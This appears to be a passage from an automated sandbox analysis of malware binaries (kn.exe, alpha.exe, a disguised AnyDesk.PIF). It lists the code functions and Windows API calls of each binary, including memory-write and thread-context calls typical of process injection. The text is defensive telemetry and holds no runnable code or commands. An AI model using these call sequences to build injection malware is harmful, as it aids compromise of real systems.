      Source: C:\Users\Public\kn.exe  Code function: 6_2_00007FF67C5893A0 CryptGetUserKey,GetLastError,#357,CryptAcquireContextW,GetLastError,CryptImportKey,GetLastError,LocalFree,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,6_2_00007FF67C5893A0
      Source: C:\Users\Public\kn.exe  Code function: 6_2_00007FF67C55342C CryptImportKey,#205,GetLastError,#357,#357,#357,SetLastError,6_2_00007FF67C55342C
      Source: C:\Users\Public\kn.exe  Code function: 6_2_00007FF67C586EA8 NCryptImportKey,#360,6_2_00007FF67C586EA8
      Source: C:\Users\Public\kn.exe  Code function: 6_2_00007FF67C550EF4 NCryptImportKey,#205,#359,#359,#357,6_2_00007FF67C550EF4
      Source: C:\Users\Public\kn.exe  Code function: 6_2_00007FF67C540F58 CertAddEncodedCertificateToStore,GetLastError,#357,UuidCreate,StringFromCLSID,CryptAcquireContextW,GetLastError,CryptImportKey,GetLastError,CertSetCTLContextProperty,GetLastError,CryptDestroyKey,CryptReleaseContext,CoTaskMemFree,CertFreeCertificateContext,6_2_00007FF67C540F58
      Source: C:\Users\Public\kn.exe  Code function: 6_2_00007FF67C5129A0 #357,#357,GetLastError,#357,CryptAcquireContextW,GetLastError,CryptGetUserKey,GetLastError,CryptGetUserKey,GetLastError,#357,CryptImportKey,GetLastError,CertFreeCertificateContext,CryptReleaseContext,LocalFree,LocalFree,CryptDestroyKey,6_2_00007FF67C5129A0
      Source: C:\Users\Public\kn.exe  Code function: 6_2_00007FF67C53EA7C #357,#357,LocalAlloc,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,CryptImportKey,GetLastError,CryptSetKeyParam,GetLastError,CryptSetKeyParam,GetLastError,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,CryptSetKeyParam,GetLastError,#357,LocalFree,LocalFree,LocalFree,CryptDestroyHash,CryptDestroyHash,6_2_00007FF67C53EA7C
      Source: C:\Users\Public\kn.exe  Code function: 6_2_00007FF67C5125E8 #357,#357,#357,CryptImportKey,GetLastError,#358,#357,CryptSetKeyParam,LocalFree,GetLastError,#357,#357,#357,CertFreeCertificateContext,CryptDestroyKey,6_2_00007FF67C5125E8
      Source: C:\Users\Public\kn.exe  Code function: 6_2_00007FF67C58A740 CryptAcquireContextW,GetLastError,#357,CryptImportKey,GetLastError,CryptDestroyKey,CryptGetUserKey,GetLastError,#358,CryptGetUserKey,GetLastError,CryptDestroyKey,#357,CryptDestroyKey,CryptReleaseContext,6_2_00007FF67C58A740
      Source: C:\Users\Public\kn.exe  Code function: 6_2_00007FF67C54E1F8 CertSaveStore,GetLastError,LocalAlloc,#357,CertSaveStore,GetLastError,#357,LocalFree,#357,#357,NCryptOpenStorageProvider,NCryptImportKey,NCryptSetProperty,NCryptFinalizeKey,LocalFree,LocalFree,NCryptFreeObject,6_2_00007FF67C54E1F8
      Source: C:\Users\Public\alpha.exe  Code function: 3_2_00007FF7E1DC89E4 NtQueryInformationToken,NtQueryInformationToken,3_2_00007FF7E1DC89E4
      Source: C:\Users\Public\alpha.exe  Code function: 3_2_00007FF7E1DB3D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,3_2_00007FF7E1DB3D94
      Source: C:\Users\Public\alpha.exe  Code function: 3_2_00007FF7E1DC898C NtQueryInformationToken,3_2_00007FF7E1DC898C
      Source: C:\Users\Public\alpha.exe  Code function: 3_2_00007FF7E1DE1538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,3_2_00007FF7E1DE1538
      Source: C:\Users\Public\alpha.exe  Code function: 3_2_00007FF7E1DC8114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,3_2_00007FF7E1DC8114
      Source: C:\Users\Public\alpha.exe  Code function: 3_2_00007FF7E1DDBCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,3_2_00007FF7E1DDBCF0
      Source: C:\Users\Public\alpha.exe  Code function: 3_2_00007FF7E1DC88C0 NtOpenThreadToken,NtOpenProcessToken,NtClose,3_2_00007FF7E1DC88C0
      Source: C:\Users\Public\alpha.exe  Code function: 3_2_00007FF7E1DC7FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError,3_2_00007FF7E1DC7FF8
      Source: C:\Users\Public\alpha.exe  Code function: 5_2_00007FF7E1DC89E4 NtQueryInformationToken,NtQueryInformationToken,5_2_00007FF7E1DC89E4
      Source: C:\Users\Public\alpha.exe  Code function: 5_2_00007FF7E1DB3D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,5_2_00007FF7E1DB3D94
      Source: C:\Users\Public\alpha.exe  Code function: 5_2_00007FF7E1DC898C NtQueryInformationToken,5_2_00007FF7E1DC898C
      Source: C:\Users\Public\alpha.exe  Code function: 5_2_00007FF7E1DE1538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,5_2_00007FF7E1DE1538
      Source: C:\Users\Public\alpha.exe  Code function: 5_2_00007FF7E1DC8114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,5_2_00007FF7E1DC8114
      Source: C:\Users\Public\alpha.exe  Code function: 5_2_00007FF7E1DDBCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,5_2_00007FF7E1DDBCF0
      Source: C:\Users\Public\alpha.exe  Code function: 5_2_00007FF7E1DC88C0 NtOpenThreadToken,NtOpenProcessToken,NtClose,5_2_00007FF7E1DC88C0
      Source: C:\Users\Public\alpha.exe  Code function: 5_2_00007FF7E1DC7FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError,5_2_00007FF7E1DC7FF8
      Source: C:\Users\Public\kn.exe  Code function: 6_2_00007FF67C5AC964 NtQuerySystemTime,RtlTimeToSecondsSince1970,6_2_00007FF67C5AC964
      Source: C:\Users\Public\Libraries\AnyDesk.PIF  Code function: 9_2_02B7DD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,9_2_02B7DD70
      Source: C:\Users\Public\Libraries\AnyDesk.PIF  Code function: 9_2_02B77D78 NtWriteVirtualMemory,9_2_02B77D78
      Source: C:\Users\Public\Libraries\AnyDesk.PIF  Code function: 9_2_02B7DBB0 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile,9_2_02B7DBB0
      Source: C:\Users\Public\Libraries\AnyDesk.PIF  Code function: 9_2_02B7DC8C RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,9_2_02B7DC8C
      Source: C:\Users\Public\Libraries\AnyDesk.PIF  Code function: 9_2_02B7DC04 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile,9_2_02B7DC04
      Source: C:\Users\Public\Libraries\AnyDesk.PIF  Code function: 9_2_02B78D70 GetThreadContext,SetThreadContext,NtResumeThread,9_2_02B78D70
      Source: C:\Users\Public\Libraries\AnyDesk.PIF  Code function: 9_2_02B78D6E GetThreadContext,SetThreadContext,NtResumeThread,9_2_02B78D6E
      Source: C:\Users\Public\alpha.exe  Code function: 10_2_00007FF7E1DC8114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,10_2_00007FF7E1DC8114
      Source: C:\Users\Public\alpha.exe  Code function: 10_2_00007FF7E1DC7FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError,10_2_00007FF7E1DC7FF8
      Source: C:\Users\Public\alpha.exe  Code function: 10_2_00007FF7E1DC89E4 NtQueryInformationToken,NtQueryInformationToken,10_2_00007FF7E1DC89E4
      Source: C:\Users\Public\alpha.exe  Code function: 10_2_00007FF7E1DB3D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,10_2_00007FF7E1DB3D94
      Source: C:\Users\Public\alpha.exe  Code function: 10_2_00007FF7E1DC898C NtQueryInformationToken,10_2_00007FF7E1DC898C
      Source: C:\Users\Public\alpha.exe  Code function: 10_2_00007FF7E1DE1538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,10_2_00007FF7E1DE1538
      Source: C:\Users\Public\alpha.exe  Code function: 10_2_00007FF7E1DDBCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,10_2_00007FF7E1DDBCF0
      Source: C:\Users\Public\alpha.exe  Code function: 10_2_00007FF7E1DC88C0 NtOpenThreadToken,NtOpenProcessToken,NtClose,10_2_00007FF7E1DC88C0
      Source: C:\Users\Public\alpha.exe  Code function: 3_2_00007FF7E1DB5240: memset,GetFileSecurityW,GetSecurityDescriptorOwner,??_V@YAXPEAX@Z,memset,CreateFileW,DeviceIoControl,memmove,CloseHandle,??_V@YAXPEAX@Z,memset,FindClose,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,3_2_00007FF7E1DB5240
      Source: C:\Users\Public\alpha.exe  Code function: 3_2_00007FF7E1DC4224 InitializeProcThreadAttributeList,UpdateProcThreadAttribute,memset,memset,GetStartupInfoW,wcsrchr,lstrcmpW,SetConsoleMode,CreateProcessW,CloseHandle,CreateProcessAsUserW,_local_unwind,GetLastError,_local_unwind,_local_unwind,CloseHandle,DeleteProcThreadAttributeList,GetLastError,GetLastError,DeleteProcThreadAttributeList,3_2_00007FF7E1DC4224
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7E1DC0A6C3_2_00007FF7E1DC0A6C
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7E1DBAA543_2_00007FF7E1DBAA54
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7E1DC42243_2_00007FF7E1DC4224
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7E1DC55543_2_00007FF7E1DC5554
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7E1DC37D83_2_00007FF7E1DC37D8
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7E1DD7F003_2_00007FF7E1DD7F00
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7E1DB6EE43_2_00007FF7E1DB6EE4
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7E1DBE6803_2_00007FF7E1DBE680
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7E1DDEE883_2_00007FF7E1DDEE88
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7E1DB52403_2_00007FF7E1DB5240
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7E1DBD2503_2_00007FF7E1DBD250
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7E1DB9E503_2_00007FF7E1DB9E50
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7E1DB76503_2_00007FF7E1DB7650
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7E1DB22203_2_00007FF7E1DB2220
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7E1DB4A303_2_00007FF7E1DB4A30
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7E1DDAA303_2_00007FF7E1DDAA30
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7E1DB8DF83_2_00007FF7E1DB8DF8
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7E1DBCE103_2_00007FF7E1DBCE10
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7E1DDD9D03_2_00007FF7E1DDD9D0
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7E1DB81D43_2_00007FF7E1DB81D4
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7E1DE15383_2_00007FF7E1DE1538
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7E1DB7D303_2_00007FF7E1DB7D30
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7E1DB85103_2_00007FF7E1DB8510
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7E1DBB0D83_2_00007FF7E1DBB0D8
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7E1DC18D43_2_00007FF7E1DC18D4
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7E1DB18843_2_00007FF7E1DB1884
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7E1DC78543_2_00007FF7E1DC7854
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7E1DDAC4C3_2_00007FF7E1DDAC4C
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7E1DB2C483_2_00007FF7E1DB2C48
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7E1DB34103_2_00007FF7E1DB3410
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7E1DB6BE03_2_00007FF7E1DB6BE0
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7E1DDAFBC3_2_00007FF7E1DDAFBC
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7E1DB3F903_2_00007FF7E1DB3F90
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7E1DB5B703_2_00007FF7E1DB5B70
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7E1DB9B503_2_00007FF7E1DB9B50
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7E1DB372C3_2_00007FF7E1DB372C
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7E1DC0A6C5_2_00007FF7E1DC0A6C
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7E1DBAA545_2_00007FF7E1DBAA54
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7E1DC42245_2_00007FF7E1DC4224
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7E1DC55545_2_00007FF7E1DC5554
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7E1DC37D85_2_00007FF7E1DC37D8
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7E1DD7F005_2_00007FF7E1DD7F00
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7E1DB6EE45_2_00007FF7E1DB6EE4
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7E1DBE6805_2_00007FF7E1DBE680
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7E1DDEE885_2_00007FF7E1DDEE88
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7E1DB52405_2_00007FF7E1DB5240
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7E1DBD2505_2_00007FF7E1DBD250
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7E1DB9E505_2_00007FF7E1DB9E50
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7E1DB76505_2_00007FF7E1DB7650
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7E1DB22205_2_00007FF7E1DB2220
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7E1DB4A305_2_00007FF7E1DB4A30
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7E1DDAA305_2_00007FF7E1DDAA30
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7E1DB8DF85_2_00007FF7E1DB8DF8
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7E1DBCE105_2_00007FF7E1DBCE10
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7E1DDD9D05_2_00007FF7E1DDD9D0
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7E1DB81D45_2_00007FF7E1DB81D4
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7E1DE15385_2_00007FF7E1DE1538
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7E1DB7D305_2_00007FF7E1DB7D30
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7E1DB85105_2_00007FF7E1DB8510
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7E1DBB0D85_2_00007FF7E1DBB0D8
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7E1DC18D45_2_00007FF7E1DC18D4
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7E1DB18845_2_00007FF7E1DB1884
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7E1DC78545_2_00007FF7E1DC7854
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7E1DDAC4C5_2_00007FF7E1DDAC4C
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7E1DB2C485_2_00007FF7E1DB2C48
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7E1DB34105_2_00007FF7E1DB3410
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7E1DB6BE05_2_00007FF7E1DB6BE0
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7E1DDAFBC5_2_00007FF7E1DDAFBC
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7E1DB3F905_2_00007FF7E1DB3F90
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7E1DB5B705_2_00007FF7E1DB5B70
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7E1DB9B505_2_00007FF7E1DB9B50
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7E1DB372C5_2_00007FF7E1DB372C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C59C1206_2_00007FF67C59C120
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C59BC106_2_00007FF67C59BC10
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5C38006_2_00007FF67C5C3800
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4C2F386_2_00007FF67C4C2F38
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C59F0206_2_00007FF67C59F020
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C59CCB86_2_00007FF67C59CCB8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C54BDA06_2_00007FF67C54BDA0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5BDD846_2_00007FF67C5BDD84
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C509D6C6_2_00007FF67C509D6C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C511D706_2_00007FF67C511D70
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C567D706_2_00007FF67C567D70
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C541E2C6_2_00007FF67C541E2C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4E5DF76_2_00007FF67C4E5DF7
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4C1DE86_2_00007FF67C4C1DE8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C50DEA46_2_00007FF67C50DEA4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C53DEB06_2_00007FF67C53DEB0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C53BE706_2_00007FF67C53BE70
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C545F046_2_00007FF67C545F04
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C501ED06_2_00007FF67C501ED0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C539EE46_2_00007FF67C539EE4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4B1F806_2_00007FF67C4B1F80
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5180186_2_00007FF67C518018
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C569FF86_2_00007FF67C569FF8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4E80806_2_00007FF67C4E8080
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5820846_2_00007FF67C582084
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C51C0B86_2_00007FF67C51C0B8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5319AC6_2_00007FF67C5319AC
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C53F9906_2_00007FF67C53F990
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5A79386_2_00007FF67C5A7938
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5A994C6_2_00007FF67C5A994C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4B1A106_2_00007FF67C4B1A10
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4DF9B86_2_00007FF67C4DF9B8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4C7AB46_2_00007FF67C4C7AB4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C569A586_2_00007FF67C569A58
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4E3A406_2_00007FF67C4E3A40
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C52BA486_2_00007FF67C52BA48
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C501A606_2_00007FF67C501A60
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C57BB286_2_00007FF67C57BB28
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C517AC86_2_00007FF67C517AC8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4BFB846_2_00007FF67C4BFB84
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C521B846_2_00007FF67C521B84
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4B5BA46_2_00007FF67C4B5BA4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C547B746_2_00007FF67C547B74
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C55FB506_2_00007FF67C55FB50
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C50FC346_2_00007FF67C50FC34
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4EFC206_2_00007FF67C4EFC20
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C563C106_2_00007FF67C563C10
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4D9BC86_2_00007FF67C4D9BC8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C51DBF06_2_00007FF67C51DBF0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5BFC906_2_00007FF67C5BFC90
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4CBCA46_2_00007FF67C4CBCA4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C531C906_2_00007FF67C531C90
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C503C606_2_00007FF67C503C60
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4C5D086_2_00007FF67C4C5D08
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4EDD206_2_00007FF67C4EDD20
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4E9CD06_2_00007FF67C4E9CD0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C50BCE86_2_00007FF67C50BCE8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C579CC06_2_00007FF67C579CC0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4EB58C6_2_00007FF67C4EB58C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5895806_2_00007FF67C589580
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4E156C6_2_00007FF67C4E156C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4BF6106_2_00007FF67C4BF610
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5395FC6_2_00007FF67C5395FC
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5155F06_2_00007FF67C5155F0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C56D6A06_2_00007FF67C56D6A0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5076B06_2_00007FF67C5076B0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5676786_2_00007FF67C567678
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5976786_2_00007FF67C597678
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4F56486_2_00007FF67C4F5648
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5856606_2_00007FF67C585660
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5936386_2_00007FF67C593638
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4DD6606_2_00007FF67C4DD660
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C53F6D86_2_00007FF67C53F6D8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C58D6DC6_2_00007FF67C58D6DC
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4CB7886_2_00007FF67C4CB788
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5097906_2_00007FF67C509790
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5337606_2_00007FF67C533760
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5638206_2_00007FF67C563820
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4CF8006_2_00007FF67C4CF800
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4D18306_2_00007FF67C4D1830
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4F17D46_2_00007FF67C4F17D4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C51D7F06_2_00007FF67C51D7F0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5277C86_2_00007FF67C5277C8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5178906_2_00007FF67C517890
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C54D8586_2_00007FF67C54D858
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5838746_2_00007FF67C583874
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C54184C6_2_00007FF67C54184C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5058CC6_2_00007FF67C5058CC
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C53F1686_2_00007FF67C53F168
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5011C86_2_00007FF67C5011C8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4CD1B86_2_00007FF67C4CD1B8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5031E06_2_00007FF67C5031E0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C58D2B46_2_00007FF67C58D2B4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5652906_2_00007FF67C565290
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5453186_2_00007FF67C545318
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5292D86_2_00007FF67C5292D8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4BF2C06_2_00007FF67C4BF2C0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C50D2C06_2_00007FF67C50D2C0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5192C46_2_00007FF67C5192C4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C59B3AC6_2_00007FF67C59B3AC
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4E73406_2_00007FF67C4E7340
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4DB36C6_2_00007FF67C4DB36C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4B73F86_2_00007FF67C4B73F8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4FF4346_2_00007FF67C4FF434
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C52D4106_2_00007FF67C52D410
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5A33D06_2_00007FF67C5A33D0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5B33D46_2_00007FF67C5B33D4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5A94A86_2_00007FF67C5A94A8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5174786_2_00007FF67C517478
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4D54A06_2_00007FF67C4D54A0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5694946_2_00007FF67C569494
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C55D4606_2_00007FF67C55D460
